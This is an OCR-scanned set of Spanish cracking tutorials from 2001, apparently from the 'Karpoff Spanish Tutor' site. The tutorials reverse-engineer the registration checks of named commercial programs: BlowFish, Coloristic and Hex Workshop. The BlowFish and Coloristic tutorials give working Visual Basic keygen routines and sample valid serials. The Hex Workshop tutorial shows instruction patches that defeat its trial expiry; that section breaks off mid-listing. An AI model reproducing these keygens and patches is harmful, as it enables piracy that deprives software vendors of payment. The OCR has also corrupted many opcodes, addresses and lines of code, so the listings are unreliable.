:004D41C0 C3 ret 


Con esto, me parece que queda explicado el procedimiento que hemos seguido para parchear el programa empacado 
de modo que al desempacarse quedara parcheado y operativo. Si alguna cosa no ha quedado clara, podéis darme un 
toque. Así terminamos con un programa que en cualquier caso, tiene una característica que lo hace distinto de 
cualquier otro programa que yo haya visto: que teniendo la clásica estructura de: serial chungo en un registro / serial 
bueno en otro / comparación entre ambos / salto condicional, no hay que parchear el salto para registrar el programa. 


Antes de despedirme quiero recordaros como siempre que debéis pagar los programas que utilicéis regularmente. No 
hagáis que me avergiience de vosotros ;-) 


Finalmente quiero saludar a mis amigos Act MagO, PrfEsOr X y ByTESCRK. También a Karpoff, Silver Storm, 
KuaTo_ThoR, y DeK_OIiN. 


Si queréis alguna aclaración sobre mis tutos, mi dirección de e-mail es: caos_reptante O hotmail.com 
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INTRODUCCION 


II 


Pues en este tutorial, lo que veremos será ver como se genera nuestro serial, realmente será ver la parte del 
código que nos interesa, de este mismo autor hay un total de 17 aplicaciones cada una genera un serial para 


nuestro nombre distinto todo ello proviniendo de nuestro nombre y empresa con que nos registremos, los 


precios de cada uno oscilan entre los $25.00, yo en lo personal no utilizo ninguno, mas que de vez en 
cuando, la pura verdad, la protección de estos programas es bastante vaga. Haciendo memoria en mi primer 
tutorial definía la manera de encontrar un serial válido para nuestro nombre, en ese tiempo aún no 
comprendía muy bien como funcionan las cosas en este ambiente, aunque no he avanzado mucho, aqui les 
entrego esta nueva producción. 


AL ATAKE 


Antes que nada debo decirles, que, nuestro serial se forma por dos cadenas de texto, es decir, nuestro nombre y la 
empresa, pero tambien debemos tomar en cuenta otras dos cadenas de caracteres como palabras clave. 


Es decir tendremos esto: 


Strgl = CadenaClavel 

Strg2 = CadenaClave2 
Nombre = NuestroNombre 
Empresa = CualquierCosa 
Serial = NuestroSeriallnválido 


Una vez hayamos descargado nuestro programa (en mi caso he seleccionado el nuevo BlowFish v2.2), instalo el 
nuevo programa y me voy a Help > Register... he ingreso mis datos 


Nombre = ByTESCRK 
Empresa = Registered 
Serial = 123456 


Salta un hermoso mensaje que dice: 


An invalid software registration number was detected. 


Iniciamos primeramente el W32DASM y desensamblamos el programa BlowFish.exe, cuando este ya ha 
desensamblado, buscamos en las Strings Reference de W32DASM y vemos que no hay ninguna cadena que nos 
identifique el mensaje de error, tomando en cuenta el primer tutorial sabemos que esta es un GetDlgltemTextA, 
entonces cerramos el programa y cargamos nuestro TRW2000, buscamos el programa y hacemos clic en Load, 
cuando salta el TRW2000 presionamos Ctrl+N y esperamos a que cargue el programa, luego, ingresamos nuestros 
datos nuevamente, antes de hacer clic en OK, presionamos Ctrl+N y volvemos a TRW2000, ponemos un punto de 
ruptura en GetDlgltemTextA y volvemos al programa con Ctrl+N, hacemos clic en OK y salta el TRW2000, vemos 
que caemos en una llamada a Kernel presionamos F12 hasta que quedemos en BlowFish 


* Referenced by a CALL at Addresses: 
1:00408A12 , :00408A20, :00408A32 


* Reference To: USER32.GetDlgltemTextA, Ord:0104h 


:0041069B FF1500924100 Call dword ptr [00419200] 


:004106A1 SF pop edi 

:004106A2 SE pop esi 

:004106A3 B801000000 mov eax, 00000001 

:004106A8 5B pop ebx 

:004106A9 C3 ret  <-- Caemos aqui y volvemos a 00408A12 


Primero, quitamos el punto de ruptura con la instrucción BC * al ir traceando vamos a llegar hasta aqui, 


:00408A42 8BD8 mov ebx, eax 

:00408A444 EsB77B0000 call 00410600 <-- Vamos a investigar aqui, entramos con F8 
:00408A49 83C438 add esp, 00000038 

:00408A4C 3D92A71901  cmp eax, 01194792 

:00408A51 7518 ¡ne 00408A6B 


En mi caso para entrar en la llamada voy a cargar el OllyDebugger "un muy buen programa en ambiente gráfico" y 
voy a cargar el programa blowfish.exe en el. Ya cargado y con el código listo para ser roto, presiono F9 para que el 
programa cargue y voy a ingresar mis datos, antes de hacer clic en OK, selecciono el Olly, presiono Ctrl+G y voy a 
00410600, pongo un punto de ruptura presionando la tecla F2 una vez y listo, y cuando hago clic en OK se pausa el 
programa y me devuelve al BPX que coloqué, presiono F9 nuevamente y me da el error de serial no válido, presiono 
OK y hago clic en OK nuevamente, selecciono el Olly y voy traceando en el con F7 y voy viendo lo siguiente: 


:00410600 51 push ecx 

:00410601 53 push ebx 

:00410602 8B5C240C mov ebx, dword ptr [esp+0C]  <-- EBX recibe mi nombre 
:00410624 BE70ED4100 mov esi, 0041ED70  <-- Aqui aparece una cadena clave 
:00410629 BFO1000000 mov edi, 00000001 

:0041062E 2BF3 sub esi, ebx 

:00410630 8BCB mov ecx, ebx 


:00410632 2BFB sub edi, ebx 


En la siguiente instrucción extraemos caracter por caracter de la primer palabra clave y tomamos su valor 
Hexadecimal, este es almacenado en EBX 


:00410634 OFBE1COE  movsx ebx, byte ptr [esi+ecx] 


Lo mismo que el anterior sin embargo, es sobre la segunda palabra clave, EAX=8 que representa la longitud de 
caracteres de nuestro nombre; EDX va aumentando uno de acuerdo a cada vez que se realiza el ciclo y 0041ED38 
alberga nuestra segunda cadena clave 


:00410638 OFBEAC1038ED4100  movsx ebp, byte ptr [eax+edx+0041ED38] 


:00410640 OFAFDD imul ebx, ebp  <-- Multiplica ebx por ebp en hexa 

:00410643 8D2C0F lea ebp, dword ptr [edi+ecx]  <-- Suma 1 en cada ciclo 
:00410646 OFAFDD imul ebx, ebp  <-- Multiplica nuevamente los valores 
:00410649 OFBE29 movsx ebp, byte ptr [ecx] <-- Extrae un caracter del nombre 
:0041064C OFAFDD imul ebx, ebp  <-- Multiplica nuevamente los valores 
:0041064F 8B6C2410 mov ebp, dword ptr [esp+10]  <-- Recupera el acumulado 
:00410653 03EB add ebp, ebx  <-- Suma el valor actual y el acumulado 
:00410655 42 inc edx  <-- Incrementa EDX en 1 

:00410656 41 incecx  <-- Incremente ECX en 1 

:00410657 3BDO cmp edx, eax  <-- Compara EDX > EAX 

:00410659 896C2410 mov dword ptr [esp+10], ebp  <-- Guarda el acumulado 
:0041065D 7CD5 31 00410634<-- Si EDX es menor que EAX vuelve a 00410634 


Al salir EAX tendrá nuestro serial en HEXA si y solo si ya se ha realizado el proceso anterior con nuestro nombre de 
la empresa en mi caso "Registered". 


:0041065F 8BC5 mov eax, ebp 
:00410661 SF pop edi 
:00410662 5D pop ebp 
:00410663 5E pop esi 
:00410664 5B pop ebx 
:00410665 59 pop ecx 
:00410666 C3 ret 


Ya que tenemos el valor en hexa vamos a seguir traceando ahora con F8 puesto que aqui unicamente se generó el 
nombre y no se uso la empresa, veamos que nos depara el código, justo lo que me temía, caemos en una nueva 
instrucción de llamada vean esto... 


:00408A74 E8B7750000 call 00410030 


Vamos a entrar aqui con F7, nos aparece esto, 


:00410030 8B442404 mov eax, dword ptr [esp+04] <--Recibe nuestro nombre 
:00410034 56 push esi 

:00410035 8B3574A04200 mov esi, dword ptr [00424074] 

:0041003B SOnbsp; push eax 


:0041003C 81CE78030000 - or esi, 00000378  <-- EST igual un valor constante 
:00410042 E8B9050000 call 00410600<-- Genera un valor Hexa de nuestro Nombre (devuelve EAX) 


:00410047 8B4C2410 mov ecx, dword ptr [esp+10]  <-- Nuestra empresa 

:0041004B 03F0 add esi,eax  <--ESI=ESI+EAX 

:0041004D 51 push ecx 

:0041004E E8ADO050000 call 00410600<- Genera un valor Hexa de nuestra empresa(devuelve EAX) 
:00410053 83C408 add esp, 00000008 

:00410056 03C6 add eax,esi <-- EAX obtiene el serial válido en hexa 

:00410058 5E pop esi 

:00410059 C3 ret 


Ahora ya hemos encontrado nuestro serial, hemos localizado la rutina de generación del serial correcto, para 


transformar el valor del serial válido en hexa debemos hacer uso de nuestra calculadora de windows, aqui les 
muestro ahora un resumen de la generación del serial válido o de la rutina en sí. 0JE QUE TODAVIA QUEDA 
ALGO LOS CAMPOS TIENEN UNA LONGITUD DE 49 CARACTERES ASI QUE A PENSAR... QUE PASARA 
SI SE LES TERMINA LA CADENA DE CARACTERES 


RUTINA ESCRITA EN VISUAL BASIC 


Public Function Genera(texto As String) 
strgl = ColoqueAquiLaCadenaUnoY Mayor 
strg2 = ColoqueAquiLaCadenaDos Y Menor 
long1 = Len(Trim(texto)) 
long2 = longl 
suma =0 
For i= 1 To longl 
extrae = Asc(Mid(strgl, long2, 1)) 
If extrae = 32 Then 


extrae = 0 
End If 
ret = extrae * Asc(Mid(strg?, 1, 1)) 
ret = ret *i 


ret = ret * Asc(Midítexto, i, 1)) 
long2 = long2 + 1 
suma = suma + ret 

Next 

Genera = suma 

End Function 


£2 Todos los de Software By Design ES 


Programa [Blowtish y] 
Nombre: [ByTESCRK 


Empresa: [Registered 
Serial: [338270767 


Software By Design 


Cómo siempre y como en cualquier tutorial, recuerden este es únicamente como diversión y con el único 
ánimo de aprender, no me hago responsable del mal uso que se le dé, recuerden que si les gusta el programa es 
mejor que lo ¡¡¡REGISTREN!!!. 


Saludos a Karpoff, PrOfesor_X, CaoS ReptantE (sigue no te rindas) y a todos los crackers hispanohablantes, en 
especial a ti por que has llegado hasta aquí. 


Si tienes alguna duda o comentario escríbeme a: ByTESCRK Giespana.es 


ByTESCRK 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2001 


Programa: Coloristic v1.2 


PROTECCION: Serial 


PROPOSITO: Sacar serial y hacer un KeyGen 


Coloristic es una simple utilería la cual agranda el área de la 
Descripcion: pantalla en donde está el cursor y nos permite ver el color de un 
pixel específico en diferentes formatos. 


Dificultad: Novato. 


DOWNLOAD : Bubble Pop Software 
Herramientas: TRW2000, W32dasm 


CRACKER: ByTESCRK FECHA: 23/08/2001 


| INTRODUCCION 


Hace algún tiempo necesité saber cuales eran los colores de algunas gráficas, necesitaba estar viendo las 
páginas y el color que representaba, este programa me ayudó mucho. Bueno, ¿como han estado?, desde mi 
primer tutorial que ya no escribía otro, ahora después de haber solventado problema con el notepad, estoy de 
vuelta. Aqui les pego la descripción completa: 


"Coloristic is a simple utility which magnifies the area of the screen surrounding the cursor. It will also 


display the color value for the pixel that is exactly under the cursor and allow you to copy that color 
value to the clipboard. In addition, you can measure the distance between any two pixels on screen, and 
save the magnified image to a file or the clipboard." 


| AL ATAKE 


Lo primero es lo primero, abrimos el programa y vemos que nos aparece una caja de texto que nos recuerda que debemos de 
registrarnos, hacemos clic en Register... y nos aparece otra, ahora ingresemos un nombre y código cualquiera, yo ingresé este 
"ByTESCRK" y "1234", nos saldrá otra ventanita que nos dice que no tenemos un serial válido. Nuestro propósito es hacer un 
Keygen, cerramos el programa y nos vamos a desensamblarlo con el W32DASM, cuando ya lo tengamos, vamos a buscar la String 
Reference del mensaje de error que nos salió en la última ventanita, osease esta 

"You have entered an invalid registration code. Please contac...'' 


Hacemos doble clic sobre ella y caemos en este lugar... 


:00403C69 E8S32360000 call 004072A0 
:00403C6E EB2A jmp 00403C9A 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:00403C26(C) Tenemos que investigar aquí 


* Possible Ref to Menu: MenulD_0064, Item: "Register..." 
| 


* Possible Reference to String Resource ID=00501: "You have entered an invalid registration code. Please contac" 


| 
:00403C70 68F5010000 push 000001F5  Caemos aqui 


:00403C75 8D45F8 lea eax, dword ptr [ebp-08] 
:00403C78 50 push eax 


Vamos a ir ahora al botón del W32DASM llamado Goto Code Location y nos vamos a ir a la referencia de arriba que sería la 
dirección 00403C26 (marcada en rojo), caemos en ella y empezamos a ver nuestros alrededores y vemos que es un salto condicional 
je, veamos el código y analicémoslo... 


:00403C13 50 push eax 

:00403C14 8B4D9C mov ecx, dword ptr [ebp-64] 

:00403C17 ESE41C0000 call 00405900 Esta es la Call que genera el serial correcto 
:00403C1C 8B439C mov eax, dword ptr [ebp-64] El valor 0 ó 1 lo guarda en EAX 
:00403C1F 83B8D800000000  cmp dword ptr [eax+000000D8], 00000000 Compara EAX no igual a 0 
:00403C26 7448 je 00403C70 Si EAX igual 0 entonces ir a 00403C70 


* Possible Ref to Menu: MenulD_0064, Item: "About Coloristic" 


* Possible Reference to String Resource ID=00500: "Thank you for registering your copy of Coloristic ..." 


:00403C28 68F4010000 push 000001F4 
:00403C2D 8D45F0 lea eax, dword ptr [ebp-10] 
:00403C30 50 push eax 


Hagamos clic en el botón CALL de la barra de herramientas de W32DASM y caemos en este punto, vemos que la direción es 
00405900, cargamos el TRW2000 y buscamos el programa coloristic.exe haciendo clic en browse, hacemos clic en load y nos 
aparece el punto de entrada del programa, ctrl+n y cerramos la ventana, vamos a Help > Register... e ingresamos nuestros datos en mi 
caso ya los dije, ponemos un punto de ruptura (Breakpoint) en 405900, volvemos al programa y al hacer clic en Register, salta el 
TRW2000, y 


:00405900 55 pushebp  Caemos aqui 

:00405901 89E5 mov ebp, esp 

:00405903 53 push ebx 

:00405904 56 push esi 

:00405905 81EC30010000 sub esp, 00000130 

:0040590B 898DC8FEFFFF mov dword ptr [ebp+FFFEFFEC8], ecx 

:00405911 8B4508 mov eax, dword ptr [ebp+08] 

:00405914 8B5004 mov edx, dword ptr [eax+04]  EDX recibe el valor de la longitud del nombre 
:00405917 8995CCFEFFFF mov dword ptr [ebp+FFFFFECC], edx 

:0040591D 8B1510F04200 mov edx, dword ptr [0042F010] Un valor 10 como constante 


:00405923 8995DOFEFFEF mov dword ptr [ebp+-FFFFFEDO], edx 
:00405929 83BDCCFEFFFFO1  cmp dword ptr [ebp+FFFFFECC], 00000001 
:00405930 7C09 31 0040593B 


1:00405932 83BDDOFEFFFF01 — cmp dword ptr [ebp+FFEFFEDO], 00000001 
1:00405939 7D19 jge 00405954 Vamos a 00405954 


1:00405954 8B4508 mov eax, dword ptr [ebp+08]  EAX = Nuestro nombre 
1:00405957 8B00 mov eax, dword ptr [eax] 

1:00405959 40 inc eax 

1:0040595A 50 push eax 

1:0040595B 8D85F4FEFFFF lea eax, dword ptr [ebpp+FFFFFEF4] 

1:00405961 50 push eax 

1:00405962 E8B9270000 call 00408120 Crea una lista de caracteres con el nombre 
1100405967 59 popecx Recibe nuestro nombre 

1:00405968 59 pop ecx 

1:00403969 8B85CCFEFFEF mov eax, dword ptr [ebp+FFFFFECC] 

:0040596F 3B85DOFEFFEF cmp eax, dword ptr [ebp+FFFFFEDO] 

1100405975 7D09 Jge 00405980 

1100405977 8B95SCCFEFFFF mov edx, dword ptr [ebp+FFFFFECC] 

1:0040597D EBO07 jmp 00405986 

1:0040597F 90 nop 

1:00405980 8B95DOFEFFFF mov edx, dword ptr [ebp+-FFFFFEDO] 

1:00405986 8995D4FEFFEF mov dword ptr [ebp+FFFFFEDA4], edx 

1:0040598C C785D8FEFFFFO0000000 mov dword ptr [ebp+FFFFFED8], 00000000 
1100405996 EB23 j¡mp004059BB  PoneEAX a0 y crea una lista por medio de una palabra clave, la cual 
¡servirá adelante, sale y va a 00405A3F 


[ep] código que continuaba fué omitido adrede para no mostrar la palabra secreta que es la base para la generación del serial 
correcto, el siguiente código es la continuación después de salir de la rutina de la palabra secreta*** 
¡EjO Esta es la rutina de generación del serial correcto 


:004059E0 8B9DCCFEFFFF mov ebx, dword ptr [ebpp+FFFFFECC] — Longitud del nombre 

1:004059E6 2B9DDOFEFFEF sub ebx, dword ptr [ebpp+FFFFFEDO]  EBX=Constante 10 - Longitud del nombre 
1:004059EC 8B85EOFEFFFF mov eax, dword ptr [ebp+FFFFFEE0]  EAX =0 en cada vuelta sumara 1 a EAX 
1:004059F2 OFB69405F4FEFFFF — movzx edx, byte ptr [ebp+eax-0000010C] Ir aqui para ver Nota 1 
:004059FA 0395E0FEFFFF add edx, dword ptr [ebp+FFFFFEE0O]  Sumara el valor de EAX 

1:00405A00 01D3 add ebx,edx  EBX=EBX+EDX 

1:00405A02 899DE4FEFFFF mov dword ptr [ebp+FFFFFEE4], ebx Mueve el resultado, servirá adelante 
1:00405A08 8$B8DE4FEFFFF mov ecx, dword ptr [ebpp+FFFFFEE4] 

1:00405A0E D1E1 shlecx, 1  ECX=ECX*2 

1:00405A 10 8B95E4FEFFEF mov edx, dword ptr [ebpp+FFFFFEE4] Recupera el valor de EBX anterior 
:00405A16 DIEA shredx,1 Divide el valor entre 2 y saca el entero 

1:00405A18 01D1 add ecx, edx  ECX=ECX+EDX 

1:00405A1A 038DD4FEFFFF add ecx, dword ptr [ebp+FFFFFED4] Suma a ECX la longitud del nombre 
1:00405A20 898DESFEFFFF mov dword ptr [ebp+FFFFFEES8], ecx 

1100405426 8B95E4FEFFFF mov edx, dword ptr [ebp+FFFFFEE4] Recupera el valor de EBX 
:00405A2C OFAF9SESFEFFFF imul edx, dword ptr [ebp+FFFFFEE8]  EDX=EDX*ECX 

1:00405A33 0195DCFEFFFF add dword ptr [ebp+FFFFFEDC], edx  Acumula el valor de EDX 
1:00405A39 FF8SS5EOFEFFFF inc dword ptr [ebp+FFFFFEE0] Incrementa uno a EAX 

1:00405A3F 8B85E0OFEFFFF mov eax, dword ptr [ebp+FFEFFFEEO] 

:00405A45 3B85CCFEFFFF cmp eax, dword ptr [ebp+FFFFFECC] 

1:00405A4B 7C93 j1004059E0 Compara si valor es menor no salta 

1:00405A4D 8B85DCFEFFFF mov eax, dword ptr [ebp+FFFFFEDC]  EAX recibe el acumulado total 
1:00405A53 31D2 xor edx, edx EDX=0 

1:00405A55 F7BSDOFEFFFF div dword ptr [ebp+FFFFFEDO] Ver Nota 2 aqui 

1:00405A5B 89D2 mov edx, edx 

1:00405A5D 8995ECFEFFFF mov dword ptr [ebp+FFFFFEEC], edx Ver Nota 3 aqui 
1:00405A63 8$BB5ECFEFFFF mov esi, dword ptr [ebp+FFFFFEEC] 
1:00405A69 46 inc esi 
1:00405A6A 8B 1D0CF04200 mov ebx, dword ptr [0042F00C] 
1:00405A70 8A 1433 mov dl, byte ptr [ebx+esi] 
1:00405A73 8895FOFEFFFF mov byte ptr [ebp+FFFFFEFO], dl 
1100405479 FFB5SDCFEFFFF push dword ptr [ebpp+FFFFFEDC] 
1:00405A7F OFBES5FOFEFFFF movsx eax, byte ptr [ebp+FFFFFEFO] 


1:00405A86 50 push eax 


:00405A87 68EA524100 push 004152EA 


:00405A8C 8D85F4FEFFEF lea eax, dword ptr [ebp+-FFFFFEF4] 

:00405A92 50 push eax 

:00405A93 E868490000 call 00404400 

:00405A98 83C410 add esp, 00000010 Aqui si solicitamos D ESP ya podemos ver nuestro serial 


E coloisie vaz AN 
Nombre | ByTESCRK 
Serial | B528375 


¿o Generar  : 


Nota 1: Extrae caracteres de acuerdo a la longitud del nombre, primero el 1, luego el 2, etc. aqui se utiliza la palabra secreta, el valor 
devuelto es decimal y es la suma de cada caracter en orden desde el primer caracter de cada palabra (la secreta y nuestro nombre) 


Nota 2: Extrae el caracter en la última posición de EAX, lo devuelve a EDX 


Nota 3: Extrae el caracter de la posición devuelta a EDX de la palabra secreta 


Modulo de generación del serial programado en Visual Basic 
Private Sub Command1_Click() 

minombre = Trim(Text1.Text) 

miserial = 0 

clave = "COLOQUE AQUI LA PALABRA CLAVE" 

largo = Len(minombre) 
If largo < 10 Then 

falta = 10 - largo 


Else 
faltan = largo - 10 
End If 
If largo > 10 Then 
largol = 10 
Else 
largol = largo 
End If 


For i= 1 To largol 
characl = Asc(Mid(minombre, i, 1)) 
charac2 = Asc(Mid(clave, i, 1)) 
Charac3 = characl + charac2 
minombrel = minombrel + Chr(Charac3) 
Next 
If Len(minombre) > 10 Then 
minombre = minombrel + Mid(minombre, 11, (Len(minombre) - 10)) 
Else 
minombre = minombrel 
End If 
For i=1 To Len(Trim(minombre)) 
edx = Asc(Mid(minombere, i, 1)) 
edx =edx + (1 - 1) 
ebx = edx - falta 
ecx = ebx * 2 
edx = Int(ebx / 2) 
ecx = ecx + edx 
ecx = ecx + largo 
edx =ebx * ecx 
miserial = miserial + edx 
Next 


LETRA = Mid(Trim(Str(miserial)), Len(Trim(Str(miserial))), 1) + 1 

LETRA = Mid(clave, LETRA, 1) 

Text2.Text = LETRA + Trim(Str(miserial)) 
End Sub 
Eso es todo, ahora ya hemos generado nuestro propio serial o nuestro keygen, antes que nada no está demás decirles que 
"Si les gusta el programa paguen por él'' 


No me responsabilizo por el mal uso de este tutorial, el fin principal es "Aprender Más". 


Ahora quiero saludar a nuestro buen amigo Karpoff que es quien nos apoya en este arte de enseñar, así tambien a CaoS_ReptantE 
puesto que sin su ayuda desinteresada este tutorial no hubiese sido posible, gracias tambien a Act_MagoO por algunas cosillas. 


ByTESCRK 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2001 


Programa: | HexWorkShop v3.02 


PROTECCION: Aplicacion con limite de tiempo 
Descripcion: Editor Hexadecimal 
Dificultad: Novato 

DOWNLOAD : http://bpsotkE.com 


Softice v4.0, W32dasm v8.93, Hex Workshop v 


Herramientas: Herramientas: 20 
Fantomas: 
CRACKER : FECHA: 07/07/2001 


INTRODUCCION 


En esta ocacion voy a analizar la version v3.02, no puedo hablar sobre las 
ventajas o desventajas de esta aplicacion, ya que al momento de hacer uso de esta, 
ya estaba vencido el periodo de evaluacion, y bueno, algo habia que hacer 


Un tanto ingenuo, volvi a instalar la aplicacion, para ver si en algo cambiaban las 
cosas, por aquello de que pudiese ser un error de instalacion o registro, y nada asi 
que 


AL ATAKE 


Veamos primero que pasa, despues de correr la aplicacion, tenemos enfrente algo 
asi: 


Upgrade Notice 


cerramos la aplicacion y ahora nos aparece esto: 


Product Expiration 


noten que marca una fecha de expiracion el 8 de Agosto y apenas estamos en 
Julio, pero eso no importa 


Nuevamente corremos la aplicacion, y ahora tenemos presente el siguiente 
mensage 


Product Expiration 


valla que son especiales estas gentes de BreackPoint Software Inc. ya que 
insisto que tienen una mania por las cajas de texto o cajas de dialogo, bueno 
sigamos adelante, seleccionemos el boton Unlock y entraremos a la seccion de 
registro 


Hex Workshop Software Registration 


O5O86 2577 | 


sin embargo estos datos no son validos y el resultado es 


Ahora carguemos la aplicacion con el w32dasm y busquemos la cadena de texto 
Invalid Key oO la cadena de texto Please check your key and try again y 
para nuestra sorpresa, no vamos a enconrtrar ninguna, es mas si buscas las 
cadenas de texto de la caja de dialogo anterior Registration Information, 
Name, Company O Cancel no vamos a encontrar nada, entonces que pasa. 


La respuesta la vamos a encontrar en el archivo bpsregwd.d11, 
carguemoslo con el w32dasm y busquemos la cadena de texto Invalid Key 


:10002E35 EB4E 3mp 10002E85 


* Referenced by a Conditional Jump at Address :10002E09 

* Possible Reference to String Resource ID=00014: "Please check 
your key and try again. If this problem persis" 

:10002E37 6A0E push 0000000E 

:10002E39 8D4DEC lea ecx, dword ptr [ebp-14] 

:10002E3C E822C70000 call 1000F563 


* Possible Reference to String Resource ID=00012: "Invalid Key" 


:10002E41 
:10002E43 
:10002E46 
:10002E4B 
:10002E4D 
:10002E4F 
:10002E52 


G6A0C push 0000000C 

8D4DF0O lea ecx, dword ptr [ebp-10] 
E818C70000 call 1000F563 

6AZ40 push 00000040 

8BCE mov ecx, esil 

FF75FO push [ebp-10] 

FF75EC push [ebp-14] 


vamonos entonces a ver quien llamo a esta rutina ( vamos a la direccion :10002E09) 


:10002DFF 
:10002E04 
:10002E07 
:10002E09 


E83BF4FFFF call 1000223F 
83C418 add esp, 00000018 
85C0 test eax, eax 

752C€ jne 10002E37 


* Possible Reference to String Resource ID=00013: "Thank you! 
Your product has been unlocked." 


:10002E0B 6A0D push 0000000D 
:10002E0D 8D4DEC lea ecx, dword ptr [ebp-14] 


:10002E10 


E84EC70000 call 1000F563 


llegando aqui, es claro lo que vamos a hacer, sustituimos 


:10002E07 


o bien 


852C TEST EAX, EAX por :10002E07 33C0 XOR EAX, EAX 


:10002E09 752€ JNE 10002E37 por :10002E09 752C JE 10002E37 


corremos la aplicacion, en la ventana Product Expiration le damos a Unlock 
en la siguiente caja llenamos los campos Name, Company y Key y le damos OK y 


obtendremos esto 


sencillo no creen? y si creen que ya logramos 'crecer' la aplicacion. pues con 
mucha pena les digo que todo este teatro es una rutina 'caza-tontos', ya que una 
vez que le das a Aceptar se cierra la aplicacion y todo vuelve a empezar 


Por lo tanto, empezamos a sospechar que esta aplicacion esta confeccionada de 
una forma diferente a las versiones anteriores, justo cuando me empezaba a 
aburrir esto de la Informatica Inversa, encuentro algo interesante, vamos a 
analizar mas a fondo la aplicacion. 


Vamos observar que la rutina 


:10002D73 FF766C push [esi+6C] 

:10002D76 8D850CFFFFFF lea eax, dword ptr [ebp+FEFFFFFOC] 
:10002D7C 50 push eax 
:10002D7D E85E0A0000 call 100037E0 

:10002D82 FF7664 push [esi+64] 

:10002D85 8D855CFFFFFF lea eax, dword ptr [ebp+FEFFFFF5C] 
:10002D8B 50 push eax 
:10002D8C E84F0A0000 call 100037E0 

:10002D91 FF7668 push [esi+68] 

:10002D94 8D45CC lea eax, dword ptr [ebp-34] 
:10002D97 50 push eax 

:10002D98 E8430A0000 call 100037E0 

:10002D9D FF7670 push [esi+70] 

:10002DA0 8D45AC lea eax, dword ptr [ebp-54] 
:10002DA3 50 push eax 

:10002DA4 E8370A0000 call 100037E0 


copia desde la localidad de memoria ++0167:00C94250 hasta la localidad memoria 
+015F:0064EBAO, todos los datos que pusimos 


Mas adelante nos volvemos a encontrar en la direccion :10002DFF con siguiente instruccion 


:10002DFF E83BF4FFFF call 1000223F 


y justo aqui, nos meternos a la rutina :1000223F para ver que sucede ahi dentro 


* Referenced by a CALL at Addresses :10002DFF 
:1000223F 55 push ebp 

:10002240 8BEC mov ebp, esp 

:10002242 81ECC8010000 sub esp, 000001C8 
:10002248 53 push ebx 


:10002272 
:10002273 
:10002276 
:10002277 
:1000227A 


50 push eax 


8D45EC lea eax, dword ptr [ebp-14] 
50 push eax 
FF751C push [ebp+1C] 


E896FCFFFF call 10001F15 


podemos observar que no sucede nada imoportante hasta llegar a la direccion :1000227A, 
vallamos ahora dentro de la rutina :10001F15 

| 

:10001F15 55 push ebp 

:10001F16 8BEC mov ebp, esp 

:10001F18 81EC54010000 sub esp, 00000154 

:10001F1E 53 push ebx 

:10001F1F 56 push esi 

:10001F20 8065FF00 and byte ptr [ebp-01], 00 

:10001F24 57 push edi 

:10001F25 6880000000 push 00000080 

:10001F2A 8D85ACFEFFFF lea eax, dword ptr [ebp+FFFFFEAC] 
:10001F30 FF7508 push [ebp+08] 

:10001F33 50 push eax 

:10001F34 E8E7240000 call 10004420 

:10001F39 8D852CFFFFFF lea eax, dword ptr [ebp+FEFFFFF2C] 
:10001F3F 50 push eax 

:10001F40 8D856CFFFFFF lea eax, dword ptr [ebp+FFFFFFE6C] 
:10001F46 50 push eax 

:10001F47 8D45AC lea eax, dword ptr [ebp-54] 

:10001F4A 50 push eax 

:10001F4B 8D85ACFEFFFF lea eax, dword ptr [ebp+FFFFFEAC] 
:10001F51 50 push eax 

:10001F52 E838FFFFFF call 10001E8F 


lo mas importante hasta aqui es la rutina ca11 10004420, ya que copia la serie de numeros 
que pusimos como KE Y 

desde la localidad de memoria 0064EC60 hasta 0064E.828 para empezar a checarla, para 
ello saltemos ahora hasta la rutina : 10001E8F 


* Referenced by a CALL at Address 


:10001F52 


:10001E£8F 
:10001E90 
:10001E92 
:10001E93 


55 push ebp 
8BEC mov ebp, 
53 push ebx 
56 push esi 


esp 


* Possible StringData Ref from Data 0b3 ->"-" 


BEA4810110 mov esi, 100181A4 


33DB xor ebx, ebx 

56 push esi 

FF7508 push [ebp+08] 
E8A4220000 call 10004148 
59 pop ecx 

3BC3 cmp eax, ebx 

59 pop ecx 

7465 je 10001F0F 

50 push eax 

FF750C push [ebp+0C] 
E82D190000 call 100037E0 
56 push esi 

53 push ebx 

E88E220000 call 10004148 
83C410 add esp, 00000010 
3BC3 cmp eax, ebx 

744E Je 10001F0F 

50 push eax 

FF7510 push [ebp+10] 
EÉE816190000 call 100037E0 
56 push esi 

53 push ebx 

E877220000 call 10004148 
83C410 add esp, 00000010 
3BC3 cmp eax, ebx 

7437 je 10001F0F 

50 push eax 

FF7514 push [ebp+14] 
E8FF180000 call 100037E0 


lo primero que les voy a mencionar es que en la direccion :10001F0F se encuentra la salida con 
error, asi que evitaremos caer ahi, y la salida con exito en :10001F0D asi que habra que saltar 
todos los obstaculos hasta llegar aqui. 


Cada vez que entra a la rutina :10004148, detecta donde estan los 'guiones' (-) 0x2Dh y los 
sustituye por 0x00h 


y cada vez que entra a la rutina :100037E0, copia cada seccion de la KEY en otras areas de la 
memoria ( :0064E928, :0064E908 y :0064E8E8 ), es claro que nosotros solo pusimos 
dos secciones, asi que la rutina nos sacara en la direccion :10001£ED6 7437 je 10001FOF 


en caso de haber puesto tres secciones, habriamos avanzado, para entonces toparnos con otro 
filtro 


:10001EE1 FF7514 push [ebp+14] 
:10001EE4 E8E7190000 call 100038D0 


:10001EE9 
:10001EEC 
:10001EEF 
:10001EF1 
:10001EF4 
:10001EF9 
:10001EFC 
:10001EFD 
:10001EFF 
:10001F02 
:10001F07 
:10001F0A 
:10001F0B 
:10001F0D 


* Referenced by a Conditional Jump at Addresses: 
:10001EBF, 


:10001F0F 
:10001F11 
:10001F12 
:10001F13 
:10001F14 


observen que la longitud de cada seccion es otro factor a considerar( 5 , 
caracteres ), asi que cambiamos de inmediato nuestro KEY por este otro 12345-678909- 


83C40C add esp, 0000000C 
83F804 cmp eax, 00000004 
751E jne 10001F0F 

FF7510 push [ebp+10] 
E8D7190000 call 100038DO 
83F806 cmp eax, 00000006 
59 pop ecx 

7510 jne 10001F0F 

FF750C push [ebp+0C] 
EÉ8c9190000 call 100038DO 
83F805 cmp eax, 00000005 
59 pop ecx 

7202 Jb 10001F0F 

B301 mov bl, 01 


